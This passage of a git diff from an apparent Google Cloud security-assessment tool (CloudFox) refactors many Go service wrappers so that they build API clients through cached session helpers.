AnalyzeCrossProjectAccess(projectIDs []string) ([] func (s *CrossProjectService) GetCrossProjectServiceAccounts(projectIDs []string) ([]CrossProjectServiceAccount, error) { ctx := context.Background() - iamService, err := iam.NewService(ctx) + iamService, err := s.getIAMService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } - crmService, err := cloudresourcemanager.NewService(ctx) + crmService, err := s.getResourceManagerService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } @@ -210,7 +251,7 @@ func (s *CrossProjectService) GetCrossProjectServiceAccounts(projectIDs []string func (s *CrossProjectService) FindLateralMovementPaths(projectIDs []string) ([]LateralMovementPath, error) { ctx := context.Background() - crmService, err := cloudresourcemanager.NewService(ctx) + crmService, err := s.getResourceManagerService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } @@ -454,7 +495,7 @@ func categorizePrivilegeLevel(role string) string { func (s *CrossProjectService) FindCrossProjectLoggingSinks(projectIDs []string) ([]CrossProjectLoggingSink, error) { ctx := context.Background() - loggingService, err := logging.NewService(ctx) + loggingService, err := s.getLoggingService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") } @@ -595,7 +636,7 @@ func analyzeLoggingSinkRisk(sink *logging.LogSink, targetProject string, knownPr func (s *CrossProjectService) FindCrossProjectPubSubExports(projectIDs []string) ([]CrossProjectPubSubExport, error) { ctx := context.Background() - pubsubService, err := pubsub.NewService(ctx) + pubsubService, err := s.getPubSubService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") } diff --git a/gcp/services/dataflowService/dataflowService.go b/gcp/services/dataflowService/dataflowService.go index c7788210..0cad6c71 100644 --- a/gcp/services/dataflowService/dataflowService.go +++ b/gcp/services/dataflowService/dataflowService.go @@ -5,6 +5,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" dataflow "google.golang.org/api/dataflow/v1b3" ) @@ -20,6 +21,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *DataflowService { return &DataflowService{session: session} } +// getService returns a Dataflow service client using cached session if available +func (s *DataflowService) getService(ctx context.Context) (*dataflow.Service, error) { + if s.session != nil { + return sdk.CachedGetDataflowService(ctx, s.session) + } + return dataflow.NewService(ctx) +} + // JobInfo represents a Dataflow job type JobInfo struct { ID string `json:"id"` @@ -57,14 +66,8 @@ type TemplateInfo struct { // ListJobs retrieves all Dataflow jobs in a project func (s *DataflowService) ListJobs(projectID string) ([]JobInfo, error) { ctx := context.Background() - var service *dataflow.Service - var err error - if s.session != nil { - service, err = dataflow.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = dataflow.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "dataflow.googleapis.com") } diff --git a/gcp/services/dataprocService/dataprocService.go b/gcp/services/dataprocService/dataprocService.go index 13005b0a..ead36b51 100644 --- a/gcp/services/dataprocService/dataprocService.go +++ b/gcp/services/dataprocService/dataprocService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" dataproc "google.golang.org/api/dataproc/v1" ) @@ -21,6 +22,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *DataprocService { return &DataprocService{session: session} } +// getService returns a Dataproc service client using cached session if available +func (s *DataprocService) getService(ctx context.Context) (*dataproc.Service, error) { + if s.session != nil { + return sdk.CachedGetDataprocService(ctx, s.session) + } + return dataproc.NewService(ctx) +} + // ClusterInfo represents a Dataproc cluster type ClusterInfo struct { Name string `json:"name"` @@ -92,14 +101,8 @@ var dataprocRegions = []string{ // ListClusters retrieves all Dataproc clusters func (s *DataprocService) ListClusters(projectID string) ([]ClusterInfo, error) { ctx := context.Background() - var service *dataproc.Service - var err error - if s.session != nil { - service, err = dataproc.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = dataproc.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") } @@ -125,14 +128,8 @@ func (s *DataprocService) ListClusters(projectID string) ([]ClusterInfo, error) // ListJobs retrieves recent Dataproc jobs func (s *DataprocService) ListJobs(projectID, region string) ([]JobInfo, error) { ctx := context.Background() - var service *dataproc.Service - var err error - if s.session != nil { - service, err = dataproc.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = dataproc.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") } diff --git a/gcp/services/dnsService/dnsService.go b/gcp/services/dnsService/dnsService.go index 10216161..c91397cd 100644 --- a/gcp/services/dnsService/dnsService.go +++ b/gcp/services/dnsService/dnsService.go @@ -6,15 +6,24 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" dns "google.golang.org/api/dns/v1" ) -type DNSService struct{} +type DNSService struct{ + session *gcpinternal.SafeSession +} func New() *DNSService { return &DNSService{} } +func NewWithSession(session *gcpinternal.SafeSession) *DNSService { + return &DNSService{ + session: session, + } +} + // ZoneInfo holds Cloud DNS managed zone details type ZoneInfo struct { Name string @@ -144,11 +153,19 @@ var takeoverPatterns = map[string]struct { ".proposify.com": {"Proposify", "HIGH", "Proposify may be deleted"}, } +// getService returns a DNS service client using cached session if available +func (ds *DNSService) getService(ctx context.Context) (*dns.Service, error) { + if ds.session != nil { + return sdk.CachedGetDNSService(ctx, ds.session) + } + return dns.NewService(ctx) +} + // Zones retrieves all DNS managed zones in a project func (ds *DNSService) Zones(projectID string) ([]ZoneInfo, error) { ctx := context.Background() - service, err := dns.NewService(ctx) + service, err := ds.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") } @@ -177,7 +194,7 @@ func (ds *DNSService) Zones(projectID string) ([]ZoneInfo, error) { func (ds *DNSService) Records(projectID, zoneName string) ([]RecordInfo, error) { ctx := context.Background() - service, err := dns.NewService(ctx) + service, err := ds.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") } diff --git a/gcp/services/domainWideDelegationService/domainWideDelegationService.go b/gcp/services/domainWideDelegationService/domainWideDelegationService.go index 7d7b8662..922a1381 100644 --- a/gcp/services/domainWideDelegationService/domainWideDelegationService.go +++ b/gcp/services/domainWideDelegationService/domainWideDelegationService.go @@ -6,15 +6,24 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" iam "google.golang.org/api/iam/v1" ) -type DomainWideDelegationService struct{} +type DomainWideDelegationService struct{ + session *gcpinternal.SafeSession +} func New() *DomainWideDelegationService { return &DomainWideDelegationService{} } +func NewWithSession(session *gcpinternal.SafeSession) *DomainWideDelegationService { + return &DomainWideDelegationService{ + session: session, + } +} + // DWDServiceAccount represents a service account with domain-wide delegation type DWDServiceAccount struct { Email string `json:"email"` @@ -56,10 +65,18 @@ var CommonWorkspaceScopes = []string{ "https://mail.google.com/", } +// getIAMService returns an IAM service client using cached session if available +func (s *DomainWideDelegationService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + // GetDWDServiceAccounts finds service accounts that may have domain-wide delegation func (s *DomainWideDelegationService) GetDWDServiceAccounts(projectID string) ([]DWDServiceAccount, error) { ctx := context.Background() - service, err := iam.NewService(ctx) + service, err := s.getIAMService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } diff --git a/gcp/services/filestoreService/filestoreService.go b/gcp/services/filestoreService/filestoreService.go index 42a69632..1ed75c42 100644 --- a/gcp/services/filestoreService/filestoreService.go +++ b/gcp/services/filestoreService/filestoreService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" file "google.golang.org/api/file/v1" ) @@ -17,6 +18,12 @@ func New() *FilestoreService { return &FilestoreService{} } +func NewWithSession(session *gcpinternal.SafeSession) *FilestoreService { + return &FilestoreService{ + session: session, + } +} + type FilestoreInstanceInfo struct { Name string `json:"name"` ProjectID string `json:"projectId"` @@ -44,9 +51,17 @@ type NfsExportOption struct { AnonGID int64 `json:"anonGid"` } +// getService returns a Filestore service client using cached session if available +func (s *FilestoreService) getService(ctx context.Context) (*file.Service, error) { + if s.session != nil { + return sdk.CachedGetFilestoreService(ctx, s.session) + } + return file.NewService(ctx) +} + func (s *FilestoreService) ListInstances(projectID string) ([]FilestoreInstanceInfo, error) { ctx := context.Background() - service, err := file.NewService(ctx) + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "file.googleapis.com") } diff --git a/gcp/services/functionsService/functionsService.go b/gcp/services/functionsService/functionsService.go index 98329358..be9ecc10 100644 --- a/gcp/services/functionsService/functionsService.go +++ b/gcp/services/functionsService/functionsService.go @@ -6,15 +6,24 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" cloudfunctions "google.golang.org/api/cloudfunctions/v2" ) -type FunctionsService struct{} +type FunctionsService struct{ + session *gcpinternal.SafeSession +} func New() *FunctionsService { return &FunctionsService{} } +func NewWithSession(session *gcpinternal.SafeSession) *FunctionsService { + return &FunctionsService{ + session: session, + } +} + // FunctionInfo holds Cloud Function details with security-relevant information type FunctionInfo struct { // Basic info @@ -75,11 +84,19 @@ type IAMBinding struct { Member string } +// getService returns a Cloud Functions v2 service instance, using cached wrapper if session is available +func (fs *FunctionsService) getService(ctx context.Context) (*cloudfunctions.Service, error) { + if fs.session != nil { + return sdk.CachedGetCloudFunctionsServiceV2(ctx, fs.session) + } + return cloudfunctions.NewService(ctx) +} + // Functions retrieves all Cloud Functions in a project across all regions func (fs *FunctionsService) Functions(projectID string) ([]FunctionInfo, error) { ctx := context.Background() - service, err := cloudfunctions.NewService(ctx) + service, err := fs.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") } diff --git a/gcp/services/gkeService/gkeService.go b/gcp/services/gkeService/gkeService.go index 28a336f3..015a7333 100644 --- a/gcp/services/gkeService/gkeService.go +++ b/gcp/services/gkeService/gkeService.go @@ -6,15 +6,32 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" container "google.golang.org/api/container/v1" ) -type GKEService struct{} +type GKEService struct { + session *gcpinternal.SafeSession +} +// New creates a new GKEService (legacy - uses ADC directly) func New() *GKEService { return &GKEService{} } +// NewWithSession creates a GKEService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *GKEService { + return &GKEService{session: session} +} + +// getService returns a container service, using session if available +func (gs *GKEService) getService(ctx context.Context) (*container.Service, error) { + if gs.session != nil { + return sdk.CachedGetContainerService(ctx, gs.session) + } + return container.NewService(ctx) +} + // ClusterInfo holds GKE cluster details with security-relevant information type ClusterInfo struct { // Basic info @@ -110,7 +127,7 @@ type NodePoolInfo struct { func (gs *GKEService) Clusters(projectID string) ([]ClusterInfo, []NodePoolInfo, error) { ctx := context.Background() - service, err := container.NewService(ctx) + service, err := gs.getService(ctx) if err != nil { return nil, nil, gcpinternal.ParseGCPError(err, "container.googleapis.com") } diff --git a/gcp/services/hmacService/hmacService.go b/gcp/services/hmacService/hmacService.go index f7cc8981..04d6a0b4 100644 --- a/gcp/services/hmacService/hmacService.go +++ b/gcp/services/hmacService/hmacService.go @@ -6,6 +6,7 @@ import ( "time" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/storage/v1" ) @@ -21,6 +22,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *HMACService { return &HMACService{session: session} } +// getStorageService returns a Storage service client using cached session if available +func (s *HMACService) getStorageService(ctx context.Context) (*storage.Service, error) { + if s.session != nil { + return sdk.CachedGetStorageService(ctx, s.session) + } + return storage.NewService(ctx) +} + // HMACKeyInfo represents a GCS HMAC key (S3-compatible access) type HMACKeyInfo struct { AccessID string `json:"accessId"` @@ -39,14 +48,8 @@ type HMACKeyInfo struct { // ListHMACKeys lists all HMAC keys in a project func (s *HMACService) ListHMACKeys(projectID string) ([]HMACKeyInfo, error) { ctx := context.Background() - var storageService *storage.Service - var err error - if s.session != nil { - storageService, err = storage.NewService(ctx, s.session.GetClientOption()) - } else { - storageService, err = storage.NewService(ctx) - } + storageService, err := s.getStorageService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") } diff --git a/gcp/services/iamService/iamService.go b/gcp/services/iamService/iamService.go index 6ef1bbc5..0ddee81b 100644 --- a/gcp/services/iamService/iamService.go +++ b/gcp/services/iamService/iamService.go @@ -12,6 +12,7 @@ import ( "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" cloudidentity "google.golang.org/api/cloudidentity/v1" crmv1 "google.golang.org/api/cloudresourcemanager/v1" iam "google.golang.org/api/iam/v1" @@ -41,6 +42,30 @@ func (s *IAMService) getClientOption() option.ClientOption { return nil } +// getIAMService returns an IAM service using cached SDK wrapper when session is available +func (s *IAMService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + +// getResourceManagerService returns a Resource Manager service using cached SDK wrapper when session is available +func (s *IAMService) getResourceManagerService(ctx context.Context) (*crmv1.Service, error) { + if s.session != nil { + return sdk.CachedGetResourceManagerService(ctx, s.session) + } + return crmv1.NewService(ctx) +} + +// getCloudIdentityService returns a Cloud Identity service using cached SDK wrapper when session is available +func (s *IAMService) getCloudIdentityService(ctx context.Context) (*cloudidentity.Service, error) { + if s.session != nil { + return sdk.CachedGetCloudIdentityService(ctx, s.session) + } + return cloudidentity.NewService(ctx) +} + // AncestryResource represents a single resource in the project's ancestry. type AncestryResource struct { Type string `json:"type"` @@ -196,14 +221,7 @@ func (s *IAMService) projectAncestry(projectID string) ([]AncestryResource, erro // Use the v1 GetAncestry API which only requires project-level read permissions // This avoids needing resourcemanager.folders.get on each folder in the hierarchy - var crmService *crmv1.Service - var err error - - if s.session != nil { - crmService, err = crmv1.NewService(ctx, s.session.GetClientOption()) - } else { - crmService, err = crmv1.NewService(ctx) - } + crmService, err := s.getResourceManagerService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } @@ -388,14 +406,7 @@ func contains(slice []string, item string) bool { // ServiceAccounts retrieves all service accounts in a project with detailed info func (s *IAMService) ServiceAccounts(projectID string) ([]ServiceAccountInfo, error) { ctx := context.Background() - var iamService *iam.Service - var err error - - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } + iamService, err := s.getIAMService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } @@ -487,14 +498,7 @@ func (s *IAMService) getServiceAccountKeys(ctx context.Context, iamService *iam. // CustomRoles retrieves all custom roles in a project func (s *IAMService) CustomRoles(projectID string) ([]CustomRole, error) { ctx := context.Background() - var iamService *iam.Service - var err error - - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } + iamService, err := s.getIAMService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } @@ -862,13 +866,7 @@ func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([ return nil, gcpinternal.ErrPermissionDenied } - var iamService *iam.Service - var err error - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } + iamService, err := s.getIAMService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } @@ -1053,13 +1051,7 @@ func (s *IAMService) GetAllEntityPermissions(projectID string) ([]EntityPermissi // GetGroupMembership retrieves members of a Google Group using Cloud Identity API // Requires cloudidentity.groups.readonly or cloudidentity.groups scope func (s *IAMService) GetGroupMembership(ctx context.Context, groupEmail string) (*GroupInfo, error) { - var ciService *cloudidentity.Service - var err error - if s.session != nil { - ciService, err = cloudidentity.NewService(ctx, s.session.GetClientOption()) - } else { - ciService, err = cloudidentity.NewService(ctx) - } + ciService, err := s.getCloudIdentityService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") } @@ -1354,14 +1346,7 @@ var saImpersonationPermissions = map[string]string{ // GetServiceAccountIAMPolicy gets the IAM policy for a specific service account func (s *IAMService) GetServiceAccountIAMPolicy(ctx context.Context, saEmail string, projectID string) (*SAImpersonationInfo, error) { - var iamService *iam.Service - var err error - - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } + iamService, err := s.getIAMService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } @@ -1807,13 +1792,7 @@ func (s *IAMService) GetUserMFAStatus(ctx context.Context, email string) (*MFASt // We need to use the Admin SDK Directory API which requires admin privileges // For now, we'll attempt to look up the user and note if we can't - var ciService *cloudidentity.Service - var err error - if s.session != nil { - ciService, err = cloudidentity.NewService(ctx, s.session.GetClientOption()) - } else { - ciService, err = cloudidentity.NewService(ctx) - } + ciService, err := s.getCloudIdentityService(ctx) if err != nil { status.Error = "Cloud Identity API not accessible" return status, nil diff --git a/gcp/services/iapService/iapService.go b/gcp/services/iapService/iapService.go index e235cb94..6d85b911 100644 --- a/gcp/services/iapService/iapService.go +++ b/gcp/services/iapService/iapService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" iap "google.golang.org/api/iap/v1" ) @@ -21,6 +22,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *IAPService { return &IAPService{session: session} } +// getService returns an IAP service client using cached session if available +func (s *IAPService) getService(ctx context.Context) (*iap.Service, error) { + if s.session != nil { + return sdk.CachedGetIAPService(ctx, s.session) + } + return iap.NewService(ctx) +} + // IAPSettingsInfo represents IAP settings for a resource type IAPSettingsInfo struct { Name string `json:"name"` @@ -55,14 +64,8 @@ type IAMBinding struct { // ListTunnelDestGroups retrieves tunnel destination groups func (s *IAPService) ListTunnelDestGroups(projectID string) ([]TunnelDestGroup, error) { ctx := context.Background() - var service *iap.Service - var err error - if s.session != nil { - service, err = iap.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = iap.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") } @@ -123,14 +126,8 @@ func (s *IAPService) getTunnelDestGroupIAMBindings(service *iap.Service, resourc // GetIAPSettings retrieves IAP settings for a resource func (s *IAPService) GetIAPSettings(projectID, resourcePath string) (*IAPSettingsInfo, error) { ctx := context.Background() - var service *iap.Service - var err error - if s.session != nil { - service, err = iap.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = iap.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") } diff --git a/gcp/services/kmsService/kmsService.go b/gcp/services/kmsService/kmsService.go index 097dd801..6eb7b5c2 100644 --- a/gcp/services/kmsService/kmsService.go +++ b/gcp/services/kmsService/kmsService.go @@ -6,15 +6,32 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" kms "google.golang.org/api/cloudkms/v1" ) -type KMSService struct{} +type KMSService struct{ + session *gcpinternal.SafeSession +} func New() *KMSService { return &KMSService{} } +func NewWithSession(session *gcpinternal.SafeSession) *KMSService { + return &KMSService{ + session: session, + } +} + +// getService returns a KMS service client using cached session if available +func (ks *KMSService) getService(ctx context.Context) (*kms.Service, error) { + if ks.session != nil { + return sdk.CachedGetKMSService(ctx, ks.session) + } + return kms.NewService(ctx) +} + // KeyRingInfo holds KMS key ring details type KeyRingInfo struct { Name string @@ -68,7 +85,7 @@ type CryptoKeyInfo struct { func (ks *KMSService) KeyRings(projectID string) ([]KeyRingInfo, error) { ctx := context.Background() - service, err := kms.NewService(ctx) + service, err := ks.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") } @@ -103,7 +120,7 @@ func (ks *KMSService) KeyRings(projectID string) ([]KeyRingInfo, error) { func (ks *KMSService) CryptoKeys(projectID string) ([]CryptoKeyInfo, error) { ctx := context.Background() - service, err := kms.NewService(ctx) + service, err := ks.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") } diff --git a/gcp/services/loadbalancerService/loadbalancerService.go b/gcp/services/loadbalancerService/loadbalancerService.go index 5c9b66b3..aad92dab 100644 --- a/gcp/services/loadbalancerService/loadbalancerService.go +++ b/gcp/services/loadbalancerService/loadbalancerService.go @@ -5,6 +5,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" compute "google.golang.org/api/compute/v1" ) @@ -20,6 +21,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *LoadBalancerService { return &LoadBalancerService{session: session} } +// getService returns a Compute service client using cached session if available +func (s *LoadBalancerService) getService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + // LoadBalancerInfo represents a load balancer configuration type LoadBalancerInfo struct { Name string `json:"name"` @@ -71,14 +80,8 @@ type BackendServiceInfo struct { // ListLoadBalancers retrieves all load balancers in a project func (s *LoadBalancerService) ListLoadBalancers(projectID string) ([]LoadBalancerInfo, error) { ctx := context.Background() - var service *compute.Service - var err error - if s.session != nil { - service, err = compute.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = compute.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } @@ -114,14 +117,8 @@ func (s *LoadBalancerService) ListLoadBalancers(projectID string) ([]LoadBalance // ListSSLPolicies retrieves all SSL policies func (s *LoadBalancerService) ListSSLPolicies(projectID string) ([]SSLPolicyInfo, error) { ctx := context.Background() - var service *compute.Service - var err error - if s.session != nil { - service, err = compute.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = compute.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } @@ -150,14 +147,8 @@ func (s *LoadBalancerService) ListSSLPolicies(projectID string) ([]SSLPolicyInfo // ListBackendServices retrieves all backend services func (s *LoadBalancerService) ListBackendServices(projectID string) ([]BackendServiceInfo, error) { ctx := context.Background() - var service *compute.Service - var err error - if s.session != nil { - service, err = compute.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = compute.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } diff --git a/gcp/services/loggingGapsService/loggingGapsService.go b/gcp/services/loggingGapsService/loggingGapsService.go index ba16c85f..08be345e 100644 --- a/gcp/services/loggingGapsService/loggingGapsService.go +++ b/gcp/services/loggingGapsService/loggingGapsService.go @@ -7,6 +7,8 @@ import ( logging "cloud.google.com/go/logging/apiv2" "cloud.google.com/go/logging/apiv2/loggingpb" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" compute "google.golang.org/api/compute/v1" container "google.golang.org/api/container/v1" sqladmin "google.golang.org/api/sqladmin/v1beta4" @@ -14,12 +16,52 @@ import ( "google.golang.org/api/iterator" ) -type LoggingGapsService struct{} +type LoggingGapsService struct{ + session *gcpinternal.SafeSession +} func New() *LoggingGapsService { return &LoggingGapsService{} } +func NewWithSession(session *gcpinternal.SafeSession) *LoggingGapsService { + return &LoggingGapsService{ + session: session, + } +} + +// getStorageService returns a Storage service client using cached session if available +func (s *LoggingGapsService) getStorageService(ctx context.Context) (*storage.Service, error) { + if s.session != nil { + return sdk.CachedGetStorageService(ctx, s.session) + } + return storage.NewService(ctx) +} + +// getComputeService returns a Compute service client using cached session if available +func (s *LoggingGapsService) getComputeService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// getContainerService returns a Container service client using cached session if available +func (s *LoggingGapsService) getContainerService(ctx context.Context) (*container.Service, error) { + if s.session != nil { + return sdk.CachedGetContainerService(ctx, s.session) + } + return container.NewService(ctx) +} + +// getSQLAdminService returns a SQL Admin service client using cached session if available +func (s *LoggingGapsService) getSQLAdminService(ctx context.Context) (*sqladmin.Service, error) { + if s.session != nil { + return sdk.CachedGetSQLAdminServiceBeta(ctx, s.session) + } + return sqladmin.NewService(ctx) +} + // LoggingGap represents a resource with missing or incomplete logging type LoggingGap struct { ResourceType string // compute, cloudsql, gke, bucket, project @@ -116,7 +158,7 @@ func (s *LoggingGapsService) getProjectAuditConfig(projectID string) (*AuditLogC func (s *LoggingGapsService) checkBucketLogging(projectID string) ([]LoggingGap, error) { ctx := context.Background() - service, err := storage.NewService(ctx) + service, err := s.getStorageService(ctx) if err != nil { return nil, err } @@ -165,7 +207,7 @@ func (s *LoggingGapsService) checkBucketLogging(projectID string) ([]LoggingGap, func (s *LoggingGapsService) checkComputeLogging(projectID string) ([]LoggingGap, error) { ctx := context.Background() - service, err := compute.NewService(ctx) + service, err := s.getComputeService(ctx) if err != nil { return nil, err } @@ -224,7 +266,7 @@ func (s *LoggingGapsService) checkComputeLogging(projectID string) ([]LoggingGap func (s *LoggingGapsService) checkGKELogging(projectID string) ([]LoggingGap, error) { ctx := context.Background() - service, err := container.NewService(ctx) + service, err := s.getContainerService(ctx) if err != nil { return nil, err } @@ -304,7 +346,7 @@ func (s *LoggingGapsService) checkGKELogging(projectID string) ([]LoggingGap, er func (s *LoggingGapsService) checkCloudSQLLogging(projectID string) ([]LoggingGap, error) { ctx := context.Background() - service, err := sqladmin.NewService(ctx) + service, err := s.getSQLAdminService(ctx) if err != nil { return nil, err } diff --git a/gcp/services/loggingService/loggingService.go b/gcp/services/loggingService/loggingService.go index d9c83cdf..0863d5f4 100644 --- a/gcp/services/loggingService/loggingService.go +++ b/gcp/services/loggingService/loggingService.go @@ -6,15 +6,32 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" logging "google.golang.org/api/logging/v2" ) -type LoggingService struct{} +type LoggingService struct{ + session *gcpinternal.SafeSession +} func New() *LoggingService { return &LoggingService{} } +func NewWithSession(session *gcpinternal.SafeSession) *LoggingService { + return &LoggingService{ + session: session, + } +} + +// getService returns a Logging service client using cached session if available +func (ls *LoggingService) getService(ctx context.Context) (*logging.Service, error) { + if ls.session != nil { + return sdk.CachedGetLoggingService(ctx, ls.session) + } + return logging.NewService(ctx) +} + // SinkInfo holds Cloud Logging sink details with security-relevant information type SinkInfo struct { Name string @@ -66,7 +83,7 @@ type MetricInfo struct { func (ls *LoggingService) Sinks(projectID string) ([]SinkInfo, error) { ctx := context.Background() - service, err := logging.NewService(ctx) + service, err := ls.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") } @@ -94,7 +111,7 @@ func (ls *LoggingService) Sinks(projectID string) ([]SinkInfo, error) { func (ls *LoggingService) Metrics(projectID string) ([]MetricInfo, error) { ctx := context.Background() - service, err := logging.NewService(ctx) + service, err := ls.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") } diff --git a/gcp/services/memorystoreService/memorystoreService.go b/gcp/services/memorystoreService/memorystoreService.go index dd3fd006..99cee11f 100644 --- a/gcp/services/memorystoreService/memorystoreService.go +++ b/gcp/services/memorystoreService/memorystoreService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" redis "google.golang.org/api/redis/v1" ) @@ -21,6 +22,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *MemorystoreService { return &MemorystoreService{session: session} } +// getService returns a Redis service client using cached session if available +func (s *MemorystoreService) getService(ctx context.Context) (*redis.Service, error) { + if s.session != nil { + return sdk.CachedGetRedisService(ctx, s.session) + } + return redis.NewService(ctx) +} + // RedisInstanceInfo represents a Redis instance type RedisInstanceInfo struct { Name string `json:"name"` @@ -44,14 +53,8 @@ type RedisInstanceInfo struct { // ListRedisInstances retrieves all Redis instances in a project func (s *MemorystoreService) ListRedisInstances(projectID string) ([]RedisInstanceInfo, error) { ctx := context.Background() - var service *redis.Service - var err error - if s.session != nil { - service, err = redis.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = redis.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "redis.googleapis.com") } diff --git a/gcp/services/networkEndpointsService/networkEndpointsService.go b/gcp/services/networkEndpointsService/networkEndpointsService.go index 77debf52..cde0542c 100644 --- 